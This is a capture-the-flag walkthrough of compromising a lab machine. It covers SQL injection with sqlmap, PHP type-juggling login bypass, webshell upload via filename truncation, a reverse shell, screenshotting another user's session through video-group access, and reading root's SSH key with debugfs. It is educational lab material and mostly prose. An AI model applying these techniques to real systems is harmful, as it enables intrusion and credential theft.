Nmap scan:
Port 80 reveals a kind of social network website.
I ran a gobuster
scan on the website, and it revealed tons of interesting directories.
On the cyberlaw.txt
file, we can find some hints on what to do next.
Interesting. So there's a chris
user and he hacked the website first.
There was a login page on the website we could access.
When trying to enter credentials for the admin
user, this was the error received.
When a random input as the user, we get a different error.
It seems that there's a boolean condition present on the website. I proceeded to test this with sqlmap
using --level=5 --risk=3
flags. I also included the --string
flag to signify which was the boolean condition to use.
We can then dump out the database.
Now we can login as chris
.
Viewing the profile of chris reveals a hint to use PHP Type Juggling.
PHP Type juggling was a type of vulnerability that can be used to force the returning of true through using specific hashes.
There are repositories of hashes that we can use easily.
When using these hashes as the password in the login page, we can login as the admin
user.
Viewing the profile of the admin
user shows a hint to bypass some kind of limit.
Didn't know how to abuse this yet, so I tried to exploit the image upload function that we now had access to.
I attempted to upload some PHP webshells, but it did not work.
When uploading a jpg file, this is the output we get.
Attempting to access our webshell does not work. However, we can see how the name of our file can be manipulated to fit the CMD being executed. Seeing the hint earlier on the admin
profile about the limits of the file name.
So, I tested this via changing the file name to something absurdly long.
There was this Trying to shorten...
bit that was rather suspicious. Perhaps we could use this to remove the .jpg extension and leave a .php extension. So what I did was attempt to upload a cmd.php.jpg
file, and have the name of the file be such that it would shorten to cmd.php
. This truncation of the name would allow me to upload my webshell.
This would mean having a file name of 236 characters (which was the max when counted), and this works in uploading the file.
We can then test our RCE.
Then we can get a reverse shell easily.
First, we can view the users present on this machine by reading the /etc/passwd
file, and see that moshe
and yossi
are present.
Then, we can view the files for the webroot. In there, we can find some SQL credentials.
We can then su
to moshe.
When running LinPEAS, we see that moshe
is part of the video
group.
Users part of the video
group have access to a video device or the screen output. I first checked if there were other users logged in via w
, and yossi
is logged in.
This means we can take a screenshot of his session and see if we can find any credentials. This blog was useful in exploiting it.
Then, we can run this perl script to convert the raw data into a screenshot.
Afterwards, we can transfer this back to our machine and find that it is an image file.
Initially, the picture looked like some kind of rubbish.
Then I realised it was probably because I messed up the dimensions of the image, so I changed to to these values using gimp
as per the script to reveal some credentials:
Then, we can su
as yossi
.
Earlier, we found that yossi
was part of the disk
and cdrom
group. Perhaps there was something mounted on the machine that we can access.
Using debugfs
on the /dev/sda1
filesystem (which just looked off), we find out that we can access the /root
directory.
We can also find the private SSH key for root
.
Then, we can SSH in as root
.